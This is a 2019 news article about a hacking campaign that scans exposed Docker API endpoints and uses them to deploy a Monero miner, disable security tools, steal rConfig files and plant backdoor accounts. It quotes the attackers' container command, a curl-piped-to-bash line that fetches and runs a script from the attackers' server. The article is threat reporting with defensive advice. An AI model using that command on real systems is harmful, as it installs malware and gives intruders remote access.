28 November 2019 | AtoZ Markets – This mass-scanning operation began last weekend, November 24, and immediately distinguished itself by its magnitude. This mass-scanning allows the hacker group to send commands to the Docker instance. And they can deploy a cryptocurrency miner on a company's Docker instances, to generate funds for the group's profits.
Hackers Mining Monero
"Bad Packets CTI API users will notice that the exploitation activity is targeting the exposed Docker instances. But it is not new and happens quite often," said Troy Mursch. He is a research director and co-founder of Bad Packets LLC, to ZDNet.
"As others have noted, this is not an average attempt by a child," said Mursch, who discovered the campaign. "There has been a moderate level of effort in this campaign. And we have not yet analyzed all of its activities."
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.— Bad Packets Report (@bad_packets) November 25, 2019
These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'",#threatintel pic.twitter.com/vxszV5SF1o
The group behind these attacks is currently scanning more than 59,000 netblocks (IP networks) for exposed Docker instances. Once the group identifies an exposed host. Attackers use the endpoint of the API to boot an Alpine Linux OS container. In there, they execute a command (chroot / mnt / bin / sh -c'curl -sL4 http://ix.io/1XQa | bash).
The command downloads and executes a Bash script from the attacker's server. This script installs a classic XMRRig cryptocurrency miner. In the two days since the launch of the campaign, hackers have already mined 14.82 Monero (XMR) coins, worth just over $ 740, Mursch said. Besides, this malicious operation is also accompanied by a measure of self-defense.
"A non-original but interesting feature of the campaign is that it uninstalls the known monitoring agents. And it kills a bunch of processes via a script downloaded from http: // ix [...] io / 1XQh," Mursch said. "While browsing through this script, we find that hackers disable security products. And also, stop LSO processes associated with rival cryptocurrency-mining botnets, such as DDG."
Read More: South Korea Cryptocurrency Bill Brings Regulatory Clarity
Malicious Script Function
Besides, Mursch also discovered a malicious script function. That scans an infected host for rConfig configuration files. It encrypts and steals, returning files to the command and control server of the group. Craig H. Rowland is the founder of Sandfly Security. He also noted that hackers also generate backdoor accounts on hacked containers. And it leaves SSH keys behind them to facilitate access and control all infected bots from a remote location.
For the moment, Mursch recommends that users and organizations that run Docker instances immediately. And check to see if they are exposing APIs endpoints on the internet, closing ports, and terminating unrecognized containers that are running.
Think we missed something? Let us know in the comments section below.